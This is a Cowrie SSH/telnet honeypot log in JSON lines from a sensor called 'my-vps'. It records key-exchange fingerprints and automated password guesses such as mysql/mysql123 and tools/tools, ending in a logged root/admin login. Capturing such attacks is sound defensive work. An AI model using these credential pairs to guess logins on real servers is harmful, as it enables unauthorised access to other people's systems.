{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:29:36.586936Z","src_ip":"212.227.235.229","session":"b18996eaeb30"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar123","message":"login attempt [sonar/sonar123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:29:37.022339Z","src_ip":"212.227.235.229","session":"b18996eaeb30"}
{"eventid":"cowrie.session.connect","src_ip":"211.216.226.195","src_port":47444,"dst_ip":"1.2.3.4","dst_port":23,"session":"ef0eaca56e6c","protocol":"telnet","message":"New connection: 211.216.226.195:47444 (1.2.3.4:23) [session: ef0eaca56e6c]","sensor":"my-vps","timestamp":"2025-08-28T05:29:37.856909Z"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:29:38.169059Z","src_ip":"212.227.235.229","session":"b18996eaeb30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50996,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9dabc27b062","protocol":"ssh","message":"New connection: 212.227.125.160:50996 (1.2.3.4:22) [session: f9dabc27b062]","sensor":"my-vps","timestamp":"2025-08-28T05:29:51.022865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:29:51.023950Z","src_ip":"212.227.125.160","session":"f9dabc27b062"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:29:51.129075Z","src_ip":"212.227.125.160","session":"f9dabc27b062"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:29:51.447272Z","src_ip":"212.227.125.160","session":"f9dabc27b062"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:29:52.747670Z","src_ip":"212.227.125.160","session":"f9dabc27b062"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38306,"dst_ip":"1.2.3.4","dst_port":22,"session":"7afa2e2dfe0f","protocol":"ssh","message":"New connection: 212.227.235.229:38306 (1.2.3.4:22) [session: 7afa2e2dfe0f]","sensor":"my-vps","timestamp":"2025-08-28T05:29:58.512337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:29:58.572793Z","src_ip":"212.227.235.229","session":"7afa2e2dfe0f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:29:58.726168Z","src_ip":"212.227.235.229","session":"7afa2e2dfe0f"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:29:59.233750Z","src_ip":"212.227.235.229","session":"7afa2e2dfe0f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:30:00.379985Z","src_ip":"212.227.235.229","session":"7afa2e2dfe0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42150,"dst_ip":"1.2.3.4","dst_port":22,"session":"91f60c779372","protocol":"ssh","message":"New connection: 212.227.125.160:42150 (1.2.3.4:22) [session: 91f60c779372]","sensor":"my-vps","timestamp":"2025-08-28T05:30:02.413623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:30:02.415481Z","src_ip":"212.227.125.160","session":"91f60c779372"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:30:02.519165Z","src_ip":"212.227.125.160","session":"91f60c779372"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools","message":"login attempt [tools/tools] failed","sensor":"my-vps","timestamp":"2025-08-28T05:30:02.833307Z","src_ip":"212.227.125.160","session":"91f60c779372"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:30:03.939006Z","src_ip":"212.227.125.160","session":"91f60c779372"}
{"eventid":"cowrie.session.closed","duration":31.286931037902832,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:30:09.143771Z","src_ip":"211.216.226.195","session":"ef0eaca56e6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44454,"dst_ip":"1.2.3.4","dst_port":22,"session":"f303181dbbe7","protocol":"ssh","message":"New connection: 212.227.235.229:44454 (1.2.3.4:22) [session: f303181dbbe7]","sensor":"my-vps","timestamp":"2025-08-28T05:30:13.873092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:30:13.873839Z","src_ip":"212.227.235.229","session":"f303181dbbe7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:30:14.018614Z","src_ip":"212.227.235.229","session":"f303181dbbe7"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools","message":"login attempt [tools/tools] failed","sensor":"my-vps","timestamp":"2025-08-28T05:30:14.454559Z","src_ip":"212.227.235.229","session":"f303181dbbe7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38706,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9efc7b22a6a","protocol":"ssh","message":"New connection: 212.227.125.160:38706 (1.2.3.4:22) [session: a9efc7b22a6a]","sensor":"my-vps","timestamp":"2025-08-28T05:30:15.103621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:30:15.104714Z","src_ip":"212.227.125.160","session":"a9efc7b22a6a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:30:15.209740Z","src_ip":"212.227.125.160","session":"a9efc7b22a6a"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse123","message":"login attempt [lighthouse/lighthouse123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:30:15.551646Z","src_ip":"212.227.125.160","session":"a9efc7b22a6a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:30:15.600532Z","src_ip":"212.227.235.229","session":"f303181dbbe7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:30:16.659508Z","src_ip":"212.227.125.160","session":"a9efc7b22a6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39198,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2d9a77e5bf4","protocol":"ssh","message":"New connection: 212.227.235.229:39198 (1.2.3.4:22) [session: f2d9a77e5bf4]","sensor":"my-vps","timestamp":"2025-08-28T05:30:21.267061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:30:21.268203Z","src_ip":"212.227.235.229","session":"f2d9a77e5bf4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:30:21.412358Z","src_ip":"212.227.235.229","session":"f2d9a77e5bf4"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse123","message":"login attempt [lighthouse/lighthouse123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:30:21.846781Z","src_ip":"212.227.235.229","session":"f2d9a77e5bf4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:30:22.993628Z","src_ip":"212.227.235.229","session":"f2d9a77e5bf4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38880,"dst_ip":"1.2.3.4","dst_port":22,"session":"0076ad76fb7d","protocol":"ssh","message":"New connection: 212.227.125.160:38880 (1.2.3.4:22) [session: 0076ad76fb7d]","sensor":"my-vps","timestamp":"2025-08-28T05:30:30.031112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:30:30.032425Z","src_ip":"212.227.125.160","session":"0076ad76fb7d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:30:30.139457Z","src_ip":"212.227.125.160","session":"0076ad76fb7d"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql123","message":"login attempt [mysql/mysql123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:30:30.534044Z","src_ip":"212.227.125.160","session":"0076ad76fb7d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:30:31.642596Z","src_ip":"212.227.125.160","session":"0076ad76fb7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44324,"dst_ip":"1.2.3.4","dst_port":22,"session":"514528e5d045","protocol":"ssh","message":"New connection: 212.227.235.229:44324 (1.2.3.4:22) [session: 514528e5d045]","sensor":"my-vps","timestamp":"2025-08-28T05:30:43.569905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:30:43.599490Z","src_ip":"212.227.235.229","session":"514528e5d045"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:30:43.743209Z","src_ip":"212.227.235.229","session":"514528e5d045"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql123","message":"login attempt [mysql/mysql123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:30:44.336497Z","src_ip":"212.227.235.229","session":"514528e5d045"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:30:45.499898Z","src_ip":"212.227.235.229","session":"514528e5d045"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44236,"dst_ip":"1.2.3.4","dst_port":22,"session":"692bf4ebe21c","protocol":"ssh","message":"New connection: 212.227.125.160:44236 (1.2.3.4:22) [session: 692bf4ebe21c]","sensor":"my-vps","timestamp":"2025-08-28T05:30:47.086724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:30:47.087631Z","src_ip":"212.227.125.160","session":"692bf4ebe21c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:30:47.191005Z","src_ip":"212.227.125.160","session":"692bf4ebe21c"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:30:47.503389Z","src_ip":"212.227.125.160","session":"692bf4ebe21c"}
